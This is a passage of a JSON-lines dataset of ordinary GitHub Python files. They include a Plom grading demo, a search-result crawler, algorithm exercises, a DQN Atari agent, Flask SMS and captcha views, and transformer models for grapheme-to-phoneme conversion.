f\"Paper.page {paper_number}.{pg}: contains info for question(s) {ql}\"\n else:\n txt = f\"Paper.page {paper_number}.{pg}: does not contain useful info - discard it!\"\n doc[-1].insert_text(\n (120, 50),\n text=txt,\n fontsize=18,\n color=[0, 0.25, 0.25],\n )\n\n doc.save(out_file)\n\n def map_homework_pages(self, homework_bundles=[]):\n print(\"Mapping homework pages to questions\")\n for bundle in homework_bundles:\n paper_number = bundle[\"paper_number\"]\n question_list = bundle[\"pages\"]\n\n bundle_name = f\"fake_hw_bundle_{paper_number}\"\n print(\n f\"Assigning pages in {bundle_name} to paper {paper_number} questions {question_list}\"\n )\n call_command(\n \"plom_paper_scan\",\n \"map\",\n bundle_name,\n \"-t\",\n paper_number,\n \"-q\",\n str(question_list),\n )\n sleep(0.5)\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Demo/services/demo_hw_bundles.py","file_name":"demo_hw_bundles.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"36522455972","text":"from googlesearch import search\nimport pandas as pd\nimport time\n\ndata = pd.read_csv(\"/media/thang/New Volume/Rasa-Chatbot/deepcare/CRAWL/CRAWL/spiders/data.csv\")\nstart_urls = []\nfor query in data['question']:\n time.sleep(5)\n for j in search(query, num=10, stop=10, pause=2):\n start_urls.append(j)\n\nf = open(\"link.txt\", \"a\")\nfor link in start_urls:\n f.write(link+\"\\n\")\nf.close()","repo_name":"nducthang/Question-Similarity-in-Medical","sub_path":"crawl-benh-vien-viet-duc/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25267926195","text":"def return_set(lst, set_val):\n result_lst = []\n for index in range(len(lst)):\n get_in_val = int(lst[index])\n i = index + 1\n j = len(lst) - 1\n while i < j:\n if i > j or i == j:\n break\n sum_val = get_in_val + int(lst[i]) + int(lst[j])\n if sum_val == set_val:\n result_lst.append([get_in_val,lst[i],lst[j]])\n i = i + 1\n elif sum_val < set_val:\n i = i + 1\n elif sum_val > set_val:\n j = j-1\n return result_lst\n\nlst = [1,2,3,4,5]\nset_val = 9\nprint(return_set(lst,set_val))","repo_name":"mvndinesh/algorithms","sub_path":"ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74384583091","text":"from time import time\nfrom line_profiler import LineProfiler\n\n\nclass Benchmark():\n \"\"\"\n This is a testing class for the benchmarking of functions.\n Input of the Benchmark class should be the function to test\n and the params (optional)\n \"\"\"\n\n def __init__(self, function, **params):\n self.function = function\n self.params = params\n\n def exec_time(self, reps=1):\n \"\"\"\n Calls function x-times and returns an array of computed execution times\n \"\"\"\n results = []\n for rep in range(reps):\n t0 = time()\n self.function(**self.params)\n t1 = time()\n results.append(t1 - t0)\n return results\n\n def profile_lines(self):\n \"\"\"\n A simple wrapper to call the line_profiler.\n Prints the line_profiler output\n \"\"\"\n lp = LineProfiler()\n lp_wrapper = lp(self.function)\n lp_wrapper(**self.params)\n lp.print_stats()\n","repo_name":"bendecoste/Deprecated-PySyft","sub_path":"syft/test/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38147764646","text":"import tkinter as tk\nimport os\n\nexamples = [\n 'drone-stars.py',\n]\nexamples += sorted([f'pt-br/{f}' for f in os.listdir('../examples/pt-br') if f.endswith('.py')])\nkeys = [str(i) for i in range(1, 10)] + [chr(i) for i in range(ord('a'), ord('z')+1)]\n\nroot = tk.Tk()\n\ndef make_callback(example):\n def callback(*args):\n os.system(f'PYTHONPATH=. python ../examples/{example}')\n return callback\n\ntk.Label(text='Examples', font='Arial 18 bold').pack()\nfor idx, example in enumerate(examples):\n callback = make_callback(example)\n tk.Button(text=f'{keys[idx]} - {example}', command=callback).pack(anchor='w')\n root.bind(f'', callback)\n\nroot.bind(f'', lambda _event: root.destroy())\nroot.mainloop()","repo_name":"rodrigorgs/tupy","sub_path":"examples/all_examples.py","file_name":"all_examples.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"21926674509","text":"import json\nfrom pprint import pprint\nfrom random import randrange, seed\n\nimport requests\n\nfrom app.scores import scores_table, table_exists, create\n\nbase_url = \"http://127.0.0.1:5000\"\nscores_path = \"/scores\"\nhighscores_path = \"/highscores\"\nlimit = \"?limit=5\"\n\n\ndef add_user_data(username, count=5):\n url = base_url + scores_path + username\n for x in range(3):\n score = randrange(10000)\n print(score)\n requests.put(url, data=str(score))\n\n\nif __name__ == \"__main__\":\n if table_exists():\n scores_table.delete()\n create()\n\n table = scores_table\n\n with open(\"../test/scores_data.json\") as json_file:\n scores = json.load(json_file)\n scores_table.upsert_scores(table, scores)\n\n seed(1234)\n\n # Check imported data\n response = requests.get(\"/scores\")\n assert response.status_code == 200\n\n # Add new user\n add_user_data(\"/user4\", 3)\n\n # Check user4 data\n response = requests.get(\"/scores\")\n assert response.status_code == 200\n\n url = base_url + highscores_path\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n\n url = base_url + highscores_path + limit\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n\n url = base_url + scores_path\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n","repo_name":"torbenmoeller/highscore","sub_path":"test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24844393767","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass STIMCNN(nn.Module):\n \"\"\"\n Implementation of the model by (Zhao et al. 2021),\n A new bearing fault diagnosis method based on signal-to-image\n mapping and convolutional neural network (STIM-CNN).\n\n (Zhao et al. 2021) Jing Zhao, Shaopu Yang, Qiang Li, Yongqiang Liu,\n Xiaohui Gu, and Wenpeng Liu, “A new bearing fault diagnosis method\n based on signal-to-image mapping and convolutional neural network,”\n Measurement, vol. 176, p. 109088, 2021,\n doi: 10.1016/j.measurement.2021.109088.\n \"\"\"\n\n def __init__(self, in_planes: int = 1, n_classes: int = 10):\n \"\"\"\n Parameters\n ----------\n in_planes: int\n The number of channels of input data.\n n_classes: int\n The number of classes of dataset.\n \"\"\"\n super(STIMCNN, self).__init__()\n self._conv_layers = nn.Sequential(\n nn.Conv2d(in_planes, 32, 5, 1, \"same\"),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(32, 64, 5, 1, \"same\"),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n )\n\n with torch.no_grad():\n dummy = torch.rand(1, 1, 28, 28)\n dummy = self._conv_layers(dummy)\n dummy = torch.flatten(dummy, 1)\n lin_input = dummy.shape[1]\n\n self._linear_layers = nn.Sequential(\n nn.Linear(lin_input, 1024),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(1024, 256),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(256, n_classes),\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self._conv_layers(x)\n x = torch.flatten(x, 1)\n x = self._linear_layers(x)\n\n return x\n","repo_name":"junior209lsj/FaultDiagnosisOptimizerBenchmark","sub_path":"fdob/model/stimcnn.py","file_name":"stimcnn.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"6985852382","text":"# Assignment #4 - Juan Espinal Comp Sci 1026 A\r\n# Student Number - 251214614\r\n# Dec 6th, 2021 - This program takes a list of countries and updates their population, area, and continent values given a file of records\r\n# - All succesful updates are then written to \"output.txt\"\r\n\r\n\r\nfrom country import Country\r\n\r\n# class that contains all the countries\r\nclass CountryCatalogue ():\r\n def __init__(self, countryFile):\r\n\r\n # list that stores all the countries objects in a list\r\n self.countryCat = []\r\n # creates a country object of class Country ()\r\n self.countryObject = Country ()\r\n\r\n file = open (countryFile, \"r\")\r\n myFile = file.readlines()[1:] # Skips the first line\r\n\r\n # Goes through every line in the data file\r\n for line in myFile:\r\n # Strips the line based on whitespace\r\n line = line.strip()\r\n\r\n # Splits it into a list based on |\r\n splitLine = line.split(\"|\")\r\n\r\n # Adds a country to the catalogue\r\n self.country = splitLine [0]\r\n self.continent = splitLine [1]\r\n self.population = splitLine [2]\r\n self.area = splitLine [3]\r\n\r\n self.addCountry(self.country,self.population,self.area,self.continent)\r\n # Adds all the countries in data.txt to the country catalogue\r\n def addData (self,countryFile):\r\n file = open (countryFile, \"r\")\r\n myFile = file.readlines()[1:] # Skips the first line\r\n\r\n for line in myFile:\r\n # Strips the line based on whitespace\r\n line = line.strip()\r\n splitLine = line.split(\"|\")\r\n self.country = splitLine [0]\r\n self.continent = splitLine [1]\r\n self.population = splitLine [2]\r\n self.area = splitLine [3]\r\n\r\n self.addCountry(self.country,self.population,self.area,self.continent)\r\n\r\n\r\n def setPopulationOfCountry (self,setCountry, populationSet):\r\n # Goes through each element in the list of countries objects\r\n for i in range (len (self.countryCat)):\r\n # Finds if the country the user has input is equal to a country in the list\r\n if setCountry == self.countryCat[i].countryName:\r\n # set the population of the country as specified by the user\r\n self.countryCat[i].setPopulation (populationSet)\r\n\r\n\r\n\r\n def setAreaOfCountry (self, setCountry,areaSet):\r\n # Goes through each element in the list of countries objects\r\n for i in range (len(self.countryCat)):\r\n # Finds if the country the user has input is equal to a country in hte list\r\n if setCountry == self.countryCat[i].countryName:\r\n # sets the area of the country as specified by the user\r\n self.countryCat[i].setArea (areaSet)\r\n\r\n\r\n\r\n def setContinentOfCountry (self, setCountry, continentSet):\r\n for i in range (len(self.countryCat)):\r\n if setCountry == self.countryCat[i].countryName:\r\n self.countryCat[i].setContinent (continentSet)\r\n\r\n # Essentially removes any duplicates countries\r\n def findCountry (self,country):\r\n # Checks to see if an object of the Country Class is in the list of country objects Country Cat\r\n\r\n if (len(self.countryCat)) != 0:\r\n for i in range (len(self.countryCat)):\r\n if self.countryCat[i].countryName == country.countryName:\r\n return country\r\n\r\n return None\r\n\r\n # Removes a country from the catalogue\r\n def removeCountry (self, country):\r\n\r\n for i in range (len (self.countryCat)):\r\n if self.countryCat[i].countryName == country:\r\n self.countryCat.pop (i)\r\n break\r\n\r\n # Adds a country to the catalogue\r\n def addCountry (self, countryName= \"\", pop = \"\",area = \"\",cont = \"\"):\r\n self.countryObject = Country (countryName)\r\n self.countryObject.setPopulation(pop)\r\n self.countryObject.setArea(area)\r\n self.countryObject.setContinent(cont)\r\n\r\n # Appends an object of class Country to the CountryCat list\r\n # Essentially removes any duplicate countries\r\n if self.findCountry(self.countryObject) == None:\r\n self.countryCat.append(self.countryObject)\r\n\r\n\r\n # prints every single country objec\r\n def printCountryCatalogue (self):\r\n for i in self.countryCat:\r\n print(i)\r\n\r\n\r\n # Writes all the countries to a file, preferably called output.txt\r\n def saveCountryCatalogue (self,fname):\r\n saveFile = open (fname, \"w\")\r\n\r\n lstofSortedCountries = []\r\n lstofIndeces = []\r\n lstofCountries = []\r\n lstofPopulation = []\r\n lstofSize = []\r\n lstofContinents = []\r\n\r\n # puts all the names, continent, populations, and area of countries in the catalogue of countries into their respective lists\r\n for i in range (len(self.countryCat)):\r\n lstofCountries.append (self.countryCat[i].countryName)\r\n lstofContinents.append (self.countryCat[i].countryContinent)\r\n lstofPopulation.append(self.countryCat[i].countryPopulation)\r\n lstofSize.append(self.countryCat[i].countyArea)\r\n\r\n # Sorts the countries in alphabetical order\r\n for i in range (len(self.countryCat)):\r\n lstofSortedCountries.append (self.countryCat[i].countryName)\r\n # Sorts the countries in alaphabetical order\r\n lstofSortedCountries.sort()\r\n\r\n # Finds where the indeces of where the sorted countries are found in the original list of countries\r\n for i in range (len(self.countryCat)):\r\n lstofIndeces.append(lstofCountries.index (lstofSortedCountries[i]))\r\n\r\n for i in range (len(self.countryCat)):\r\n self.countryCat[i].setCountry(lstofSortedCountries[i])\r\n\r\n # Changes the continent, population, and area of each country in the catalogue to their respective sorted countries\r\n for i in range (len (self.countryCat)):\r\n self.countryCat[i].setContinent(lstofContinents[lstofIndeces[i]])\r\n self.countryCat[i].setPopulation (lstofPopulation[lstofIndeces[i]])\r\n self.countryCat[i].setArea (lstofSize[lstofIndeces[i]])\r\n\r\n\r\n saveFile.write (\"Country|Continent|Population|Area\\n\")\r\n\r\n # writes the country name, continent, population,and area onto a file called output.txt\r\n for i in range (len(self.countryCat)):\r\n saveFile.write (self.countryCat[i].countryName+ \"|\"+self.countryCat[i].countryContinent + \"|\" + self.countryCat[i].countryPopulation+ \"|\" + self.countryCat[i].countyArea+ \"\\n\")","repo_name":"jespinal-uwo/CS-1026","sub_path":"Assignment-4/catalogue.py","file_name":"catalogue.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15578634965","text":"from flask import Blueprint, request, make_response\nfrom utils.captcha import Captcha\nfrom io import BytesIO\nfrom exts import aliyunsms\nfrom utils import restful\nimport random\nfrom .forms import SMSCaptchaForm\nfrom utils import web_cache\nfrom tasks import send_sms_captcha\n\nbp = Blueprint('common', __name__, url_prefix='/c')\n\n\n@bp.route('/sms_captcha/', methods=[\"POST\"])\ndef sms_captcha():\n form = SMSCaptchaForm(request.form)\n if form.validate():\n telephone = form.telephone.data\n captcha = random.randint(100000, 999999)\n # result = aliyunsms.send_single(telephone, {\"code\": captcha})\n # if result:\n # web_cache.RedisCache().set(telephone, captcha)\n # else:\n # return restful.params_error(msg=\"发送失败\")\n send_sms_captcha(telephone, captcha)\n web_cache.RedisCache().set(telephone, captcha)\n return restful.success()\n else:\n return restful.params_error(msg=\"参数错误\")\n\n\n@bp.route('/captcha/')\ndef graph_captcha():\n text, image = Captcha.gene_graph_captcha()\n web_cache.RedisCache().set(text.lower(), text.lower())\n out = BytesIO()\n image.save(out, 'png')\n out.seek(0)\n resp = make_response(out.read())\n resp.content_type = 'image/png'\n return resp\n","repo_name":"lianmc123/website","sub_path":"apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73877572854","text":"import sys\nfrom collections import deque\n\nn, m, v = map(int, sys.stdin.readline().split())\n\nedges = [[0 for __ in range(n+1)] for _ in range(n+1)]\n\n# 2차원 리스트를 통해 모든 간선의 연관 관계를 정의\nfor _ in range(m):\n first, second = map(int, (sys.stdin.readline().split()))\n edges[first][second] = 1\n edges[second][first] = 1\n\n\ndfsVisit, bfsVisit = [False]*(n+1), [False]*(n+1)\n\n\ndef dfs(start):\n if dfsVisit[start]:\n return\n dfsVisit[start] = True\n print(start, end=' ')\n\n for i in range(n):\n if edges[start][i+1] == 1:\n dfs(i+1)\n\n\ndef bfs(idx):\n bfsQue = deque([idx])\n bfsVisit[idx] = True\n while bfsQue:\n start = bfsQue.popleft()\n print(start, end=' ')\n\n for i in range(n):\n if edges[start][i+1] == 1 and not bfsVisit[i+1]:\n bfsQue.append(i+1)\n bfsVisit[i+1] = True\n\n\ndfs(v)\nprint()\nbfs(v)\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210106/1260 DFS와 BFS.py","file_name":"1260 DFS와 BFS.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32876811781","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \nclass Solution:\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if k == 1:\n return head\n \n node_list = [None] * k\n before_head = None\n answer = None\n h = head\n while(True):\n i = 0\n while(h and i < k):\n node_list[i] = h\n h = h.next\n if h:\n i += 1\n \n if i + 1 < k:\n break\n \n node_list[0].next = node_list[k - 1].next\n for i in reversed(range(1, k)):\n node_list[i].next = node_list[i - 1]\n \n if before_head:\n before_head.next = node_list[k - 1]\n else:\n answer = node_list[k - 1]\n before_head = node_list[0]\n return answer\n\nn = 2\nhead = ListNode(1)\nh = head\nfor i in range(2, n + 1):\n h.next = ListNode(i)\n h = h.next\n\nh = Solution().reverseKGroup(head, 2)\nwhile(h):\n print(h.val, end=' ')\n h = h.next\nprint()","repo_name":"yeardream-high6/coding_test","sub_path":"이부경/LeetCode/100/25. Reverse Nodes in k-Group.py","file_name":"25. Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23110002901","text":"from gym.core import ObservationWrapper\nfrom gym.spaces import Box\nfrom keras.layers import Conv2D, Dense, Flatten\nimport keras\nimport numpy as np\nfrom scipy.misc import imresize\nimport tensorflow as tf\n\n\nclass DQNAgent(object):\n \"\"\"\n This is a classical convolutional neural network with three convolutional layers,\n followed by two fully connected layers. People familiar with object recognition\n networks may notice that there are no pooling layers. But if you really think\n about that, then pooling layers buy you a translation invariance – the network\n becomes insensitive to the location of an object in the image. That makes\n perfect sense for a classification task like ImageNet, but for games, the location\n of the ball is crucial in determining the potential reward and we wouldn't want\n to discard this information!\n\n http://neuro.cs.ut.ee/demystifying-deep-reinforcement-learning/\n \"\"\"\n\n def __init__(self, name, state_shape, n_actions, epsilon=0, reuse=False):\n with tf.variable_scope(name, reuse=reuse):\n network = keras.models.Sequential()\n network.add(Conv2D(16, (3, 3), strides=2, activation='relu', input_shape=state_shape))\n network.add(Conv2D(32, (3, 3), strides=2, activation='relu'))\n network.add(Conv2D(64, (3, 3), strides=2, activation='relu'))\n network.add(Flatten())\n network.add(Dense(256, activation='relu'))\n network.add(Dense(n_actions, activation='linear'))\n self.network = network\n self.n_actions = n_actions\n self.state_t = tf.placeholder('float32', [None,] + list(state_shape))\n self.q_values_t = self.get_symbolic_q_values(self.state_t)\n\n self.weights = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)\n self.epsilon = epsilon\n\n def get_symbolic_q_values(self, state_t):\n \"\"\" Takes agent's observation, returns Q-values. Both are tf tensors. \"\"\"\n q_values = self.network(state_t)\n\n assert tf.is_numeric_tensor(q_values) and q_values.shape.ndims == 2, \\\n 'Please return 2D tf tensor of Q-values, got %s' % repr(q_values)\n assert int(q_values.shape[1]) == self.n_actions\n\n return q_values\n\n def get_q_values(self, state_t):\n \"\"\" Same as symbolic step except operates on numpy arrays \"\"\"\n sess = tf.get_default_session()\n return sess.run(self.q_values_t, {self.state_t: state_t})\n\n def sample_actions(self, q_values):\n \"\"\" Pick actions given Q-values. Uses epsilon-greedy exploration strategy. \"\"\"\n epsilon = self.epsilon\n batch_size, n_actions = q_values.shape\n random_actions = np.random.choice(n_actions, size=batch_size)\n best_actions = q_values.argmax(axis=-1)\n should_explore = np.random.choice([0, 1], batch_size, p=[1 - epsilon, epsilon])\n return np.where(should_explore, random_actions, best_actions)\n\n\nclass PreprocessAtariImage(ObservationWrapper):\n\n def __init__(self, env):\n super().__init__(env)\n self.img_size = (64, 64)\n self.observation_space = Box(0.0, 1.0, (self.img_size[0], self.img_size[1], 1))\n\n def _observation(self, img):\n img = img[34:-16, :, :]\n img = imresize(img, self.img_size)\n img = img.mean(-1, keepdims=True)\n img = img.astype('float32')\n img /= 255.\n return img\n","repo_name":"markmo/dltemplate","sub_path":"src/rl/dqn_breakout/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"10057748912","text":"import numpy as np\nfrom scipy.spatial import cKDTree\n\n# def calculate_true_lon_lat(ds):\n# dvars = ds.variables\n# rlon = dvars[\"rlon\"]\n# rlat = dvars[\"rlat\"]\n# proj = dvars[\"projection_ob_tran\"]\n# rlon, rlat = np.meshgrid(rlon, rlat, sparse=False, indexing=\"ij\")\n# tf = pyproj.Transformer.from_crs(proj.proj4, \"epsg:4326\", always_xy=True)\n# # pylint: disable=unpacking-non-sequence\n# lon, lat = tf.transform(rlon, rlat)\n# return lon, lat\n\n\n\ndef nearest(lat,lon, lat_pos, lon_pos):\n \"\"\"Function to find index to nearest point \"\"\"\n M = np.c_[np.ravel(lon), np.ravel(lat)]\n tree = cKDTree(M)\n _, ii = tree.query([lon_pos, lat_pos], k=1)\n idy, idx = np.where((lon == M[ii][0]) & (lat == M[ii][1]))\n return int(idx), int(idy)\n","repo_name":"SINTEF/blues-metocean-lib","sub_path":"src/bluesmet/common/latlon.py","file_name":"latlon.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12859203682","text":"from abc import ABC, abstractmethod\nfrom enum import Enum\nfrom typing import Tuple, Dict, Any\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import TransformerEncoderLayer, LayerNorm, TransformerEncoder\n\nfrom dp.model.utils import get_dedup_tokens, _make_len_mask, _generate_square_subsequent_mask, PositionalEncoding\nfrom dp.preprocessing.text import Preprocessor\n\n\nclass ModelType(Enum):\n TRANSFORMER = 'transformer'\n AUTOREG_TRANSFORMER = 'autoreg_transformer'\n\n def is_autoregressive(self) -> bool:\n \"\"\"\n Returns: bool: Whether the model is autoregressive.\n \"\"\"\n return self in {ModelType.AUTOREG_TRANSFORMER}\n\n\nclass Model(torch.nn.Module, ABC):\n\n def __init__(self):\n super().__init__()\n\n @abstractmethod\n def generate(self, batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Generates phonemes for a text batch\n\n Args:\n batch (Dict[str, torch.Tensor]): Dictionary containing 'text' (tokenized text tensor),\n 'text_len' (text length tensor),\n 'start_index' (phoneme start indices for AutoregressiveTransformer)\n\n Returns:\n Tuple[torch.Tensor, torch.Tensor]: The predictions. The first element is a tensor (phoneme tokens)\n and the second element is a tensor (phoneme token probabilities)\n \"\"\"\n pass\n\n\nclass ForwardTransformer(Model):\n\n def __init__(self,\n encoder_vocab_size: int,\n decoder_vocab_size: int,\n d_model=512,\n d_fft=1024,\n layers=4,\n dropout=0.1,\n heads=1) -> None:\n super().__init__()\n\n self.d_model = d_model\n\n self.embedding = nn.Embedding(encoder_vocab_size, d_model)\n self.pos_encoder = PositionalEncoding(d_model, dropout)\n\n encoder_layer = TransformerEncoderLayer(d_model=d_model,\n nhead=heads,\n dim_feedforward=d_fft,\n dropout=dropout,\n activation='relu')\n encoder_norm = LayerNorm(d_model)\n self.encoder = TransformerEncoder(encoder_layer=encoder_layer,\n num_layers=layers,\n norm=encoder_norm)\n\n self.fc_out = nn.Linear(d_model, decoder_vocab_size)\n\n def forward(self,\n batch: Dict[str, torch.Tensor]) -> torch.Tensor: # shape: [N, T]\n \"\"\"\n Forward pass of the model on a data batch.\n\n Args:\n batch (Dict[str, torch.Tensor]): Input batch entry 'text' (text tensor).\n\n Returns:\n Tensor: Predictions.\n \"\"\"\n\n x = batch['text']\n x = x.transpose(0, 1) # shape: [T, N]\n src_pad_mask = _make_len_mask(x).to(x.device)\n x = self.embedding(x)\n x = self.pos_encoder(x)\n x = self.encoder(x, src_key_padding_mask=src_pad_mask)\n x = self.fc_out(x)\n x = x.transpose(0, 1)\n return x\n\n @torch.jit.export\n def generate(self,\n batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Inference pass on a batch of tokenized texts.\n\n Args:\n batch (Dict[str, torch.Tensor]): Input batch with entry 'text' (text tensor).\n\n Returns:\n Tuple: The first element is a Tensor (phoneme tokens) and the second element\n is a tensor (phoneme token probabilities).\n \"\"\"\n\n with torch.no_grad():\n x = self.forward(batch)\n tokens, logits = get_dedup_tokens(x)\n return tokens, logits\n\n @classmethod\n def from_config(cls, config: dict) -> 'ForwardTransformer':\n preprocessor = Preprocessor.from_config(config)\n return ForwardTransformer(\n encoder_vocab_size=preprocessor.text_tokenizer.vocab_size,\n decoder_vocab_size=preprocessor.phoneme_tokenizer.vocab_size,\n d_model=config['model']['d_model'],\n d_fft=config['model']['d_fft'],\n layers=config['model']['layers'],\n dropout=config['model']['dropout'],\n heads=config['model']['heads']\n )\n\n\nclass AutoregressiveTransformer(Model):\n\n def __init__(self,\n encoder_vocab_size: int,\n decoder_vocab_size: int,\n end_index: int,\n d_model=512,\n d_fft=1024,\n encoder_layers=4,\n decoder_layers=4,\n dropout=0.1,\n heads=1):\n super().__init__()\n\n self.end_index = end_index\n self.d_model = d_model\n self.encoder = nn.Embedding(encoder_vocab_size, d_model)\n self.pos_encoder = PositionalEncoding(d_model, dropout)\n self.decoder = nn.Embedding(decoder_vocab_size, d_model)\n self.pos_decoder = PositionalEncoding(d_model, dropout)\n self.transformer = nn.Transformer(d_model=d_model, nhead=heads, num_encoder_layers=encoder_layers,\n num_decoder_layers=decoder_layers, dim_feedforward=d_fft,\n dropout=dropout, activation='relu')\n self.fc_out = nn.Linear(d_model, decoder_vocab_size)\n\n def forward(self, batch: Dict[str, torch.Tensor]): # shape: [N, T]\n \"\"\"\n Foward pass of the model on a data batch.\n\n Args:\n batch (Dict[str, torch.Tensor]): Input batch with entries 'text' (text tensor) and 'phonemes'\n (phoneme tensor for teacher forcing).\n\n Returns:\n Tensor: Predictions.\n \"\"\"\n\n src = batch['text']\n trg = batch['phonemes'][:, :-1]\n\n src = src.transpose(0, 1) # shape: [T, N]\n trg = trg.transpose(0, 1)\n\n trg_mask = _generate_square_subsequent_mask(len(trg)).to(trg.device)\n\n src_pad_mask = _make_len_mask(src).to(trg.device)\n trg_pad_mask = _make_len_mask(trg).to(trg.device)\n\n src = self.encoder(src)\n src = self.pos_encoder(src)\n\n trg = self.decoder(trg)\n trg = self.pos_decoder(trg)\n\n output = self.transformer(src, trg, src_mask=None, tgt_mask=trg_mask,\n memory_mask=None, src_key_padding_mask=src_pad_mask,\n tgt_key_padding_mask=trg_pad_mask, memory_key_padding_mask=src_pad_mask)\n output = self.fc_out(output)\n output = output.transpose(0, 1)\n return output\n\n @torch.jit.export\n def generate(self,\n batch: Dict[str, torch.Tensor],\n max_len: int = 100) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Inference pass on a batch of tokenized texts.\n\n Args:\n batch (Dict[str, torch.Tensor]): Dictionary containing the input to the model with entries 'text'\n and 'start_index'\n max_len (int): Max steps of the autoregressive inference loop.\n\n Returns:\n Tuple: Predictions. The first element is a Tensor of phoneme tokens and the second element\n is a Tensor of phoneme token probabilities.\n \"\"\"\n\n input = batch['text']\n start_index = batch['start_index']\n\n batch_size = input.size(0)\n input = input.transpose(0, 1) # shape: [T, N]\n src_pad_mask = _make_len_mask(input).to(input.device)\n with torch.no_grad():\n input = self.encoder(input)\n input = self.pos_encoder(input)\n input = self.transformer.encoder(input,\n src_key_padding_mask=src_pad_mask)\n out_indices = start_index.unsqueeze(0)\n out_logits = []\n for i in range(max_len):\n tgt_mask = _generate_square_subsequent_mask(i + 1).to(input.device)\n output = self.decoder(out_indices)\n output = self.pos_decoder(output)\n output = self.transformer.decoder(output,\n input,\n memory_key_padding_mask=src_pad_mask,\n tgt_mask=tgt_mask)\n output = self.fc_out(output) # shape: [T, N, V]\n out_tokens = output.argmax(2)[-1:, :]\n out_logits.append(output[-1:, :, :])\n\n out_indices = torch.cat([out_indices, out_tokens], dim=0)\n stop_rows, _ = torch.max(out_indices == self.end_index, dim=0)\n if torch.sum(stop_rows) == batch_size:\n break\n\n out_indices = out_indices.transpose(0, 1) # out shape [N, T]\n out_logits = torch.cat(out_logits, dim=0).transpose(0, 1) # out shape [N, T, V]\n out_logits = out_logits.softmax(-1)\n out_probs = torch.ones((out_indices.size(0), out_indices.size(1)))\n for i in range(out_indices.size(0)):\n for j in range(0, out_indices.size(1)-1):\n out_probs[i, j+1] = out_logits[i, j].max()\n return out_indices, out_probs\n\n @classmethod\n def from_config(cls, config: Dict[str, Any]) -> 'AutoregressiveTransformer':\n \"\"\"\n Initializes an autoregressive Transformer model from a config.\n Args:\n config (dict): Configuration containing the hyperparams.\n\n Returns:\n AutoregressiveTransformer: Model object.\n \"\"\"\n\n preprocessor = Preprocessor.from_config(config)\n return AutoregressiveTransformer(\n encoder_vocab_size=preprocessor.text_tokenizer.vocab_size,\n decoder_vocab_size=preprocessor.phoneme_tokenizer.vocab_size,\n end_index=preprocessor.phoneme_tokenizer.end_index,\n d_model=config['model']['d_model'],\n d_fft=config['model']['d_fft'],\n encoder_layers=config['model']['layers'],\n decoder_layers=config['model']['layers'],\n dropout=config['model']['dropout'],\n heads=config['model']['heads']\n )\n\n\ndef create_model(model_type: ModelType, config: Dict[str, Any]) -> Model:\n \"\"\"\n Initializes a model from a config for a given model type.\n\n Args:\n model_type (ModelType): Type of model to be initialized.\n config (dict): Configuration containing hyperparams.\n\n Returns: Model: Model object.\n \"\"\"\n\n if model_type is ModelType.TRANSFORMER:\n model = ForwardTransformer.from_config(config)\n elif model_type is ModelType.AUTOREG_TRANSFORMER:\n model = AutoregressiveTransformer.from_config(config)\n else:\n raise ValueError(f'Unsupported model type: {model_type}. '\n f'Supported types: {[t.value for t in ModelType]}')\n return model\n\n\ndef load_checkpoint(checkpoint_path: str, device: str = 'cpu') -> Tuple[Model, 